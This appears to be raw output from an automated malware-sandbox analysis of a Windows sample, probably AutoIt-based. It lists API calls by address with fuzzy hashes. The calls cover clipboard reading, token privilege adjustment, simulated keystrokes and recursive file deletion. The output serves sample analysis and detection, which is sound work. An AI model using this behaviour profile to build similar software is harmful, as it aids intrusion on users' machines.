                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,00A934E2,?,00000001), ref: 00A93E6D
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3664257935-0
                                                                                                                                                        • Opcode ID: 317f0495359e2f3a57cd8acd86e54ecb63b433f92cc574cdf1862ab8c0d4ea60
                                                                                                                                                        • Instruction ID: f12de245d0a0802fb4a7aca484d0f00151287e70aabe3d12761edf68d8c02baf
                                                                                                                                                        • Opcode Fuzzy Hash: 317f0495359e2f3a57cd8acd86e54ecb63b433f92cc574cdf1862ab8c0d4ea60
                                                                                                                                                        • Instruction Fuzzy Hash: 91F015B6606751DFCF349F64D494852BBF6AF047193248A2EE1D682622C7319944DF00
                                                                                                                                                        APIs
                                                                                                                                                        • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00AD7A11
                                                                                                                                                          • Part of subcall function 00A97E53: _memmove.LIBCMT ref: 00A97EB9
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FolderPath_memmove
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3334745507-0
                                                                                                                                                        • Opcode ID: 29f8ef062d8dcb037bf6ab03b9494cd375c8bae27f178e4530e0f803acba600e
                                                                                                                                                        • Instruction ID: 320e17524070e32dc9649dd7747d4327aab8184737ce2ec4c1c372ddf2644312
                                                                                                                                                        • Opcode Fuzzy Hash: 29f8ef062d8dcb037bf6ab03b9494cd375c8bae27f178e4530e0f803acba600e
                                                                                                                                                        • Instruction Fuzzy Hash: 59D05EA66002282FDF50E6649C09DFB36ADC744104F0042A0786DD2142E920AE4586F0
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AD6623: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000001,00000003,?,00AD685E,?,?,?,00B04A5C,00B2E448,00000003,?,?), ref: 00AD66E2
                                                                                                                                                        • WriteFile.KERNEL32(?,?,00B522E8,00000000,00000000,?,?,?,00B04A5C,00B2E448,00000003,?,?,00A94C44,?,?), ref: 00AD686C
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$PointerWrite
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 539440098-0
                                                                                                                                                        APIs
                                                                                                                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00A91952
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSendTimeout
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1599653421-0
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A9193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00A91952
                                                                                                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00ACE3AA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend$Timeout
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1777923405-0
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: TextWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 530164218-0
                                                                                                                                                        APIs
                                                                                                                                                        • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,00B049DA,?,?,00000000), ref: 00A94FC4
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FilePointer
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 973152223-0
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ClearVariant
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1473721057-0
                                                                                                                                                        APIs
                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,00B05950), ref: 00A9510C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CloseHandle
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2962429428-0
                                                                                                                                                        • Opcode ID: 406a87b003400ef84c8c9a2d1e7fdfcae45d1a65b914138fa90bdb556fa9796f
                                                                                                                                                        • Instruction ID: 3548a24d8384e2e3462b038c3567ece5e438ecf7b0abac0ae43040de647421b3
                                                                                                                                                        • Opcode Fuzzy Hash: 406a87b003400ef84c8c9a2d1e7fdfcae45d1a65b914138fa90bdb556fa9796f
                                                                                                                                                        • Instruction Fuzzy Hash: BAE0B675900B12DFC6328F2AE804452FBF5FFE13613218A2FD4E582660DBB0588ADB90
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00AAAF8E
                                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?,?), ref: 00AFF64E
                                                                                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00AFF6AD
                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00AFF6EA
                                                                                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00AFF711
                                                                                                                                                        • SendMessageW.USER32 ref: 00AFF737
                                                                                                                                                        • _wcsncpy.LIBCMT ref: 00AFF7A3
                                                                                                                                                        • GetKeyState.USER32(00000011), ref: 00AFF7C4
                                                                                                                                                        • GetKeyState.USER32(00000009), ref: 00AFF7D1
                                                                                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00AFF7E7
                                                                                                                                                        • GetKeyState.USER32(00000010), ref: 00AFF7F1
                                                                                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00AFF820
                                                                                                                                                        • SendMessageW.USER32 ref: 00AFF843
                                                                                                                                                        • SendMessageW.USER32(?,00001030,?,00AFDE69), ref: 00AFF940
                                                                                                                                                        • SetCapture.USER32(?), ref: 00AFF970
                                                                                                                                                        • ClientToScreen.USER32(?,?), ref: 00AFF9D4
                                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 00AFF9FA
                                                                                                                                                        • ReleaseCapture.USER32 ref: 00AFFA05
                                                                                                                                                        • GetCursorPos.USER32(?), ref: 00AFFA3A
                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00AFFA47
                                                                                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00AFFAA9
                                                                                                                                                        • SendMessageW.USER32 ref: 00AFFAD3
                                                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00AFFB12
                                                                                                                                                        • SendMessageW.USER32 ref: 00AFFB3D
                                                                                                                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00AFFB55
                                                                                                                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00AFFB60
                                                                                                                                                        • GetCursorPos.USER32(?), ref: 00AFFB81
                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00AFFB8E
                                                                                                                                                        • GetParent.USER32(?), ref: 00AFFBAA
                                                                                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00AFFC10
                                                                                                                                                        • SendMessageW.USER32 ref: 00AFFC40
                                                                                                                                                        • ClientToScreen.USER32(?,?), ref: 00AFFC96
                                                                                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00AFFCC2
                                                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00AFFCEA
                                                                                                                                                        • SendMessageW.USER32 ref: 00AFFD0D
                                                                                                                                                        • ClientToScreen.USER32(?,?), ref: 00AFFD57
                                                                                                                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00AFFD87
                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00AFFE1C
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend$ClientScreen$LongStateWindow$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                                                                                                                                        • String ID: @GUI_DRAGID$F
                                                                                                                                                        • API String ID: 3461372671-4164748364
                                                                                                                                                        • Opcode ID: d069286501366dbc779d387892b112c8829bc06b1c62dc3934b9c362324c400a
                                                                                                                                                        • Instruction ID: 0df5e306ad6e5dbfba7058098c860b69a8b00d15fa49a666187f4d52f9ad6e91
                                                                                                                                                        • Opcode Fuzzy Hash: d069286501366dbc779d387892b112c8829bc06b1c62dc3934b9c362324c400a
                                                                                                                                                        • Instruction Fuzzy Hash: 8C329971204249AFDB60DFA8C884ABABBE5BF48358F144A69F695C72B1DB31DC04CB51
                                                                                                                                                        APIs
                                                                                                                                                        • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00AFAFDB
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                        • String ID: %d/%02d/%02d
                                                                                                                                                        • API String ID: 3850602802-328681919
                                                                                                                                                        • Opcode ID: 1b1028d65467021480dd9b7b19a1c0cafa56e0ccf0354e721943995b7f320a84
                                                                                                                                                        • Instruction ID: 609777e4d54445439488a9beb1d5ef74367312d5abc2e503c4697acf5166bbed
                                                                                                                                                        • Opcode Fuzzy Hash: 1b1028d65467021480dd9b7b19a1c0cafa56e0ccf0354e721943995b7f320a84
                                                                                                                                                        • Instruction Fuzzy Hash: 2812B0B1500218ABEB259FA8CD89FFEBBB8EF55350F108259F619DB2D1DB708941CB11
                                                                                                                                                        APIs
                                                                                                                                                        • GetForegroundWindow.USER32(00000000,00000000), ref: 00AAF796
                                                                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B04388
                                                                                                                                                        • IsIconic.USER32(000000FF), ref: 00B04391
                                                                                                                                                        • ShowWindow.USER32(000000FF,00000009), ref: 00B0439E
                                                                                                                                                        • SetForegroundWindow.USER32(000000FF), ref: 00B043A8
                                                                                                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B043BE
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00B043C5
                                                                                                                                                        • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00B043D1
                                                                                                                                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00B043E2
                                                                                                                                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00B043EA
                                                                                                                                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 00B043F2
                                                                                                                                                        • SetForegroundWindow.USER32(000000FF), ref: 00B043F5
                                                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B0440A
                                                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00B04415
                                                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B0441F
                                                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00B04424
                                                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B0442D
                                                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00B04432
                                                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B0443C
                                                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00B04441
                                                                                                                                                        • SetForegroundWindow.USER32(000000FF), ref: 00B04444
                                                                                                                                                        • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00B0446B
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                                                        • API String ID: 4125248594-2988720461
                                                                                                                                                        • Opcode ID: 00b60608bbd6ae1291028bc28628e8844395015f81c2961f0750129bbb77d9c8
                                                                                                                                                        • Instruction ID: 2d1a782e988c28bfca2bac885cd34e033e805112be966af278ccbb859459f280
                                                                                                                                                        • Opcode Fuzzy Hash: 00b60608bbd6ae1291028bc28628e8844395015f81c2961f0750129bbb77d9c8
                                                                                                                                                        • Instruction Fuzzy Hash: 4A3176B1A40218BFEB215B719C49FBF7EADEB44B50F518065FB05E71D1CBB05D01AAA0
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A931B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00A931DA
                                                                                                                                                          • Part of subcall function 00AD7B9F: __wsplitpath.LIBCMT ref: 00AD7BBC
                                                                                                                                                          • Part of subcall function 00AD7B9F: __wsplitpath.LIBCMT ref: 00AD7BCF
                                                                                                                                                          • Part of subcall function 00AD7C0C: GetFileAttributesW.KERNEL32(?,00AD6A7B), ref: 00AD7C0D
                                                                                                                                                        • _wcscat.LIBCMT ref: 00AD6B9D
                                                                                                                                                        • _wcscat.LIBCMT ref: 00AD6BBB
                                                                                                                                                        • __wsplitpath.LIBCMT ref: 00AD6BE2
                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00AD6BF8
                                                                                                                                                        • _wcscpy.LIBCMT ref: 00AD6C57
                                                                                                                                                        • _wcscat.LIBCMT ref: 00AD6C6A
                                                                                                                                                        • _wcscat.LIBCMT ref: 00AD6C7D
                                                                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00AD6CAB
                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00AD6CBC
                                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00AD6CDB
                                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00AD6CEA
                                                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 00AD6CFF
                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00AD6D10
                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00AD6D37
                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00AD6D53
                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00AD6D61
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteMove$AttributesCopyFirstFullNameNextPath_wcscpylstrcmpi
                                                                                                                                                        • String ID: \*.*
                                                                                                                                                        • API String ID: 1867810238-1173974218
                                                                                                                                                        APIs
                                                                                                                                                        • OpenClipboard.USER32(00B2DBF0), ref: 00AE70C3
                                                                                                                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 00AE70D1
                                                                                                                                                        • GetClipboardData.USER32(0000000D), ref: 00AE70D9
                                                                                                                                                        • CloseClipboard.USER32 ref: 00AE70E5
                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00AE7101
                                                                                                                                                        • CloseClipboard.USER32 ref: 00AE710B
                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00AE7120
                                                                                                                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 00AE712D
                                                                                                                                                        • GetClipboardData.USER32(00000001), ref: 00AE7135
                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00AE7142
                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00AE7176
                                                                                                                                                        • CloseClipboard.USER32 ref: 00AE7283
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3222323430-0
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00ACBEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00ACBF0F
                                                                                                                                                          • Part of subcall function 00ACBEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00ACBF3C
                                                                                                                                                          • Part of subcall function 00ACBEC3: GetLastError.KERNEL32 ref: 00ACBF49
                                                                                                                                                        • _memset.LIBCMT ref: 00ACBA34
                                                                                                                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00ACBA86
                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00ACBA97
                                                                                                                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00ACBAAE
                                                                                                                                                        • GetProcessWindowStation.USER32 ref: 00ACBAC7
                                                                                                                                                        • SetProcessWindowStation.USER32(00000000), ref: 00ACBAD1
                                                                                                                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00ACBAEB
                                                                                                                                                          • Part of subcall function 00ACB8B0: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000), ref: 00ACB8C5
                                                                                                                                                          • Part of subcall function 00ACB8B0: CloseHandle.KERNEL32(?), ref: 00ACB8D7
                                                                                                                                                        Strings
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                                                        • String ID: $default$winsta0
                                                                                                                                                        • API String ID: 2063423040-1027155976
                                                                                                                                                        APIs
                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?,756E8FB0,?,00000000), ref: 00AE2065
                                                                                                                                                        • _wcscmp.LIBCMT ref: 00AE207A
                                                                                                                                                        • _wcscmp.LIBCMT ref: 00AE2091
                                                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 00AE20A3
                                                                                                                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 00AE20BD
                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00AE20D5
                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00AE20E0
                                                                                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00AE20FC
                                                                                                                                                        • _wcscmp.LIBCMT ref: 00AE2123
                                                                                                                                                        • _wcscmp.LIBCMT ref: 00AE213A
                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00AE214C
                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(00B43A68), ref: 00AE216A
                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00AE2174
                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00AE2181
                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00AE2191
                                                                                                                                                        Strings
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                        • String ID: *.*
                                                                                                                                                        • API String ID: 1803514871-438819550
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00AAAF8E
                                                                                                                                                        • DragQueryPoint.SHELL32(?,?), ref: 00AFF14B
                                                                                                                                                          • Part of subcall function 00AFD5EE: ClientToScreen.USER32(?,?), ref: 00AFD617
                                                                                                                                                          • Part of subcall function 00AFD5EE: GetWindowRect.USER32(?,?), ref: 00AFD68D
                                                                                                                                                          • Part of subcall function 00AFD5EE: PtInRect.USER32(?,?,00AFEB2C), ref: 00AFD69D
                                                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00AFF1B4
                                                                                                                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00AFF1BF
                                                                                                                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00AFF1E2
                                                                                                                                                        • _wcscat.LIBCMT ref: 00AFF212
                                                                                                                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00AFF229
                                                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00AFF242
                                                                                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00AFF259
                                                                                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00AFF27B
                                                                                                                                                        • DragFinish.SHELL32(?), ref: 00AFF282
                                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 00AFF36D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                                                                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                        • API String ID: 2166380349-3440237614
                                                                                                                                                        • Opcode ID: 181456ba234fdc0e78632a323b548e7cc9183bddc16381477c40231732b6eb87
                                                                                                                                                        • Instruction ID: d78bf51c9399d6ef3c4be4a4bf73ae04dcdacf362162abf56d21f7785af990d7
                                                                                                                                                        • Opcode Fuzzy Hash: 181456ba234fdc0e78632a323b548e7cc9183bddc16381477c40231732b6eb87
                                                                                                                                                        • Instruction Fuzzy Hash: D9616772508304AFC700EF64DD85EABBBF8FF89750F404A19F695971A1DB709A05CB52
                                                                                                                                                        APIs
                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?,756E8FB0,?,00000000), ref: 00AE21C0
                                                                                                                                                        • _wcscmp.LIBCMT ref: 00AE21D5
                                                                                                                                                        • _wcscmp.LIBCMT ref: 00AE21EC
                                                                                                                                                          • Part of subcall function 00AD7606: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00AD7621
                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00AE221B
                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00AE2226
                                                                                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00AE2242
                                                                                                                                                        • _wcscmp.LIBCMT ref: 00AE2269
                                                                                                                                                        • _wcscmp.LIBCMT ref: 00AE2280
                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00AE2292
                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(00B43A68), ref: 00AE22B0
                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00AE22BA
                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00AE22C7
                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00AE22D7
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                        • String ID: *.*
                                                                                                                                                        • API String ID: 1824444939-438819550
                                                                                                                                                        • Opcode ID: 84689245723bb0a234f7c99949876c75006601f7e68c308f23e066a2665d71a3
                                                                                                                                                        • Instruction ID: c7285e6a14b7abf97427890d28f3d64eba094e379254f25baf71c582e673bf88
                                                                                                                                                        • Opcode Fuzzy Hash: 84689245723bb0a234f7c99949876c75006601f7e68c308f23e066a2665d71a3
                                                                                                                                                        • Instruction Fuzzy Hash: 1D31D2329412597ACF14EBA5EC49FDE77AC9F45320F144191EA14E30A0EB70DF85CB69
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _memmove_memset
                                                                                                                                                        • String ID: Q\E$[$\$\$\$]$^
                                                                                                                                                        • API String ID: 3555123492-286096704
                                                                                                                                                        • Opcode ID: 8a82f8b554a15d4b9df624ee544f82117d395fe88a5634e8ad71004d621840c1
                                                                                                                                                        • Instruction ID: 88c73111549513fce939439f41c4932c0316cfd881ef2dc0416e20eb4d3d9996
                                                                                                                                                        • Opcode Fuzzy Hash: 8a82f8b554a15d4b9df624ee544f82117d395fe88a5634e8ad71004d621840c1
                                                                                                                                                        • Instruction Fuzzy Hash: E472AC71E14219DBDF28CF98C9806EDB7F1FF48314F2481A9D855AB281E774AE81DB90
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00AAAF8E
                                                                                                                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00AFED0C
                                                                                                                                                        • GetFocus.USER32 ref: 00AFED1C
                                                                                                                                                        • GetDlgCtrlID.USER32(00000000), ref: 00AFED27
                                                                                                                                                        • _memset.LIBCMT ref: 00AFEE52
                                                                                                                                                        • GetMenuItemInfoW.USER32 ref: 00AFEE7D
                                                                                                                                                        • GetMenuItemCount.USER32(00000000), ref: 00AFEE9D
                                                                                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 00AFEEB0
                                                                                                                                                        • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 00AFEEE4
                                                                                                                                                        • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 00AFEF2C
                                                                                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00AFEF64
                                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 00AFEF99
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                                                                                                                                        • String ID: 0
                                                                                                                                                        • API String ID: 3616455698-4108050209
                                                                                                                                                        • Opcode ID: 3fa72e8ca0aa56a09eb0058557026b8485c77d88c687c39530f4047c9a942f43
                                                                                                                                                        • Instruction ID: 0cd1c3b9a94ba6af080aeabe5447e04691a8265cbcf656c6031383d291f86816
                                                                                                                                                        • Opcode Fuzzy Hash: 3fa72e8ca0aa56a09eb0058557026b8485c77d88c687c39530f4047c9a942f43
                                                                                                                                                        • Instruction Fuzzy Hash: E0817E71208309AFD720DF54D884ABBBBE9FB88754F00496DFA95972A1D730DD05CB62
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00ACB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00ACB903
